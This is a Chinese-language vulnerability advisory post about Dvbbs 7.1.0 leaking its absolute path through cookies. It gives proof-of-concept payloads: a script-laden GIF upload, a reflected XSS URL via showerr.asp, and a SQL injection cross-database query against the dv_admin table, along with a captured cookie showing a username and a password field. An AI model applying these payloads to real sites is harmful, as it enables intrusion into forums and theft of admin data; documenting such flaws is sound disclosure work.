Dvbbs7.1.0 cookie存在泄露绝对路径漏洞

所属分类: 实用技巧 / 漏洞研究 阅读数: 1624
收藏 0 赞 0 分享
漏洞发现:LiNZI[B.C.T]@www.cnbct.org 
厂商名字:动网先锋论谈 
厂商地址:http://www.dvbbs.net/ 
漏洞程序:Dvbbs 7.1.0 
漏洞描述: 
Dvbbs 7.1.0 的Cookie存在泄露站点的绝对路径的漏洞,攻击者可以配合其它技术,实现SQL跨库查询等。 
漏洞利用例子: 
一、泄露绝对漏洞测试: 
对官方的测试站点:bbs.dvbbs.net 
上传一张图,代码如下: 
GIF89a 
<script>alert(document.cookie)</script> 
抓包得到cookie如下 
Cookie: ASPSESSIONIDSSDSCBQD=NHANOBNCAPCPAMCFMAGDIJCB; dwebdvbbs7%2E1%2E0=UserID=617054&usercookies=1&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=linzibct&password=t8ob621664s5v6HL&userhidden=2&StatUserID=2189992004; Dvbbs= 
分析cookie可以得到站点的绝对路径如下: 
d:\\web\\dvbbs7为论谈的绝对路径 
二、攻击延伸: 
www.host.com 
主程序存在sql注入漏洞,但是找不到表名和字段名。 
注入点假设: 
www.host.com\\linzi.asp?fuck=you 
论谈为dvbbs 7.1.0 ,数据库为data\\\\dvbbs.asp,做了防下载处理. 
利用上面的动网暴路径,抓包得到绝对路径为 d:\\www\\dvbbs\\data\\dvbbs.asp 
实现跨库查询如下: 
www.host.com\\linzi.asp?fuck=you and (select count(*) from dv_admin in "d:\\www\\dvbbs\\data\\dvbbs.asp") 
官方补丁: 
尚无 

测试方法可以有所改变,只需要用户得到目标网站的COOKIE信息就可以了.不需要是BBS的用户的情况下,请大家使用以下方法: 
http://www.target.com/bbs/showerr.asp?BoardID=0&ErrCodes=60,60&action=<script>alert(document.cookie)</script> 
因为动网的showerr.asp页面过滤不严导致了跨站的效果产生,虽然无伤大雅!! 
更多精彩内容其他人还在看

为动网论坛添加一个密码嗅探器(DVBBS)

为动网论坛添加一个密码嗅探器(DVBBS)
收藏 0 赞 0 分享

黑客攻击揭密--分析选定的网络攻击

黑客攻击揭密--分析选定的网络攻击
收藏 0 赞 0 分享

2005年黑客聚焦:追踪垃圾邮件(图)

2005年黑客聚焦:追踪垃圾邮件(图)
收藏 0 赞 0 分享

剖析网站遭遇的黑客的三次入侵

剖析网站遭遇的黑客的三次入侵
收藏 0 赞 0 分享

域名劫持---163.net被黑的分析

域名劫持---163.net被黑的分析
收藏 0 赞 0 分享

悬念音乐程序安装程序写马(图)

悬念音乐程序安装程序写马(图)
收藏 0 赞 0 分享

为什么经常被网络入侵?探究原因

为什么经常被网络入侵?探究原因
收藏 0 赞 0 分享

黑客之门的魅力:感染与加载(图)

黑客之门的魅力:感染与加载(图)
收藏 0 赞 0 分享

诱人视频请君入瓮 解析RealPlayer溢出漏洞

诱人视频请君入瓮 解析RealPlayer溢出漏洞
收藏 0 赞 0 分享

漏洞漫舞的飞骋

漏洞漫舞的飞骋
收藏 0 赞 0 分享
查看更多